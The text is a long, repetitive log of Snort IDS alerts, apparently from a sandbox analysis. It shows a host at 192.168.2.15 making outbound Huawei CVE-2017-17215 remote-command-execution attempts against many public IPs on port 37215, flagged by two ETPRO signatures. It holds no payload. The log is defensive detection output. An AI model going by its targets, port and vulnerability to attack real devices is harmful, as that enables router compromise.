            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38338 -> 197.215.197.41:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38338 -> 197.215.197.41:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48904 -> 70.18.22.70:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48904 -> 70.18.22.70:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49564 -> 197.135.3.47:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49564 -> 197.135.3.47:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53224 -> 208.120.222.11:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53224 -> 208.120.222.11:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44110 -> 157.148.80.52:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44110 -> 157.148.80.52:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56058 -> 197.10.81.4:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56058 -> 197.10.81.4:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49684 -> 135.255.104.163:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49684 -> 135.255.104.163:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58904 -> 157.0.25.157:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58904 -> 157.0.25.157:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33492 -> 204.176.244.95:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33492 -> 204.176.244.95:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60876 -> 77.37.205.186:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60876 -> 77.37.205.186:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57650 -> 197.200.136.122:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57650 -> 197.200.136.122:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46904 -> 41.41.3.99:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46904 -> 41.41.3.99:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35014 -> 52.41.97.210:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35014 -> 52.41.97.210:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53776 -> 45.248.203.157:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53776 -> 45.248.203.157:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44022 -> 41.171.138.183:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44022 -> 41.171.138.183:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49192 -> 157.53.132.244:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49192 -> 157.53.132.244:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60070 -> 197.153.35.103:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60070 -> 197.153.35.103:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35600 -> 41.127.71.99:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35600 -> 41.127.71.99:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54326 -> 182.167.139.6:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54326 -> 182.167.139.6:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46372 -> 61.168.200.163:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46372 -> 61.168.200.163:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36618 -> 201.189.221.100:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36618 -> 201.189.221.100:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58424 -> 157.101.105.173:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58424 -> 157.101.105.173:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43198 -> 218.242.161.83:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43198 -> 218.242.161.83:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42328 -> 205.96.59.81:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42328 -> 205.96.59.81:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59646 -> 23.116.225.139:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59646 -> 23.116.225.139:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54282 -> 179.74.239.36:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54282 -> 179.74.239.36:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40600 -> 52.73.180.83:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40600 -> 52.73.180.83:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45200 -> 197.25.48.130:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45200 -> 197.25.48.130:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39686 -> 157.41.82.210:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39686 -> 157.41.82.210:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49880 -> 157.36.20.248:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49880 -> 157.36.20.248:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48950 -> 197.21.90.196:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48950 -> 197.21.90.196:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52822 -> 70.203.250.103:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52822 -> 70.203.250.103:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54332 -> 41.199.164.123:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54332 -> 41.199.164.123:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41850 -> 189.211.49.42:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41850 -> 189.211.49.42:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57874 -> 157.15.58.97:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57874 -> 157.15.58.97:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49590 -> 41.42.172.166:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49590 -> 41.42.172.166:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48296 -> 41.102.196.211:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48296 -> 41.102.196.211:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40216 -> 199.188.154.25:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40216 -> 199.188.154.25:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55992 -> 105.154.191.137:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55992 -> 105.154.191.137:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35216 -> 154.82.67.132:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35216 -> 154.82.67.132:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37062 -> 41.112.139.33:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37062 -> 41.112.139.33:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52792 -> 100.196.156.81:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52792 -> 100.196.156.81:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40336 -> 157.146.45.22:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40336 -> 157.146.45.22:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40206 -> 157.17.163.78:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40206 -> 157.17.163.78:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58008 -> 41.155.20.177:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58008 -> 41.155.20.177:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37084 -> 41.193.215.146:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37084 -> 41.193.215.146:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34030 -> 157.15.103.215:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34030 -> 157.15.103.215:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41640 -> 41.218.145.209:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41640 -> 41.218.145.209:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42418 -> 65.19.94.124:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42418 -> 65.19.94.124:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50706 -> 116.109.8.85:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50706 -> 116.109.8.85:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42534 -> 41.217.174.228:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42534 -> 41.217.174.228:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42156 -> 131.3.230.199:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42156 -> 131.3.230.199:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36542 -> 41.26.185.115:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36542 -> 41.26.185.115:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37416 -> 157.115.129.71:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37416 -> 157.115.129.71:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60386 -> 157.29.221.69:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60386 -> 157.29.221.69:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35230 -> 162.95.184.254:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35230 -> 162.95.184.254:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50594 -> 197.55.167.33:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50594 -> 197.55.167.33:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59188 -> 197.24.206.173:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59188 -> 197.24.206.173:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54474 -> 197.218.252.129:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54474 -> 197.218.252.129:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41642 -> 41.252.242.163:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41642 -> 41.252.242.163:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51050 -> 96.243.225.101:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51050 -> 96.243.225.101:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46638 -> 197.129.74.162:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46638 -> 197.129.74.162:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46694 -> 197.171.129.191:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46694 -> 197.171.129.191:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35856 -> 14.86.207.74:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35856 -> 14.86.207.74:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40946 -> 169.249.142.211:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40946 -> 169.249.142.211:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34304 -> 69.105.202.81:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34304 -> 69.105.202.81:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41088 -> 197.227.145.220:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41088 -> 197.227.145.220:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59666 -> 131.36.4.7:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59666 -> 131.36.4.7:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49822 -> 197.246.131.152:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49822 -> 197.246.131.152:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58354 -> 197.121.104.4:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58354 -> 197.121.104.4:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55542 -> 167.174.181.21:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55542 -> 167.174.181.21:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33232 -> 197.248.76.77:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33232 -> 197.248.76.77:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37746 -> 197.227.36.174:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37746 -> 197.227.36.174:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56790 -> 149.130.156.57:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56790 -> 149.130.156.57:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37342 -> 41.192.187.104:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37342 -> 41.192.187.104:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58938 -> 157.207.110.181:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58938 -> 157.207.110.181:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40130 -> 157.231.115.104:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40130 -> 157.231.115.104:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53154 -> 144.36.14.70:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53154 -> 144.36.14.70:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47526 -> 157.172.192.101:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47526 -> 157.172.192.101:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45464 -> 157.148.39.255:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45464 -> 157.148.39.255:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32844 -> 157.85.254.1:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32844 -> 157.85.254.1:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40290 -> 41.71.193.54:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40290 -> 41.71.193.54:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48246 -> 41.29.194.113:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48246 -> 41.29.194.113:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40652 -> 4.50.23.68:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40652 -> 4.50.23.68:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59532 -> 157.15.145.23:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59532 -> 157.15.145.23:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50176 -> 20.253.161.169:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50176 -> 20.253.161.169:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49306 -> 115.89.132.75:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49306 -> 115.89.132.75:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51556 -> 93.159.166.239:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51556 -> 93.159.166.239:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51456 -> 197.169.248.84:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51456 -> 197.169.248.84:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44190 -> 41.125.79.202:37215
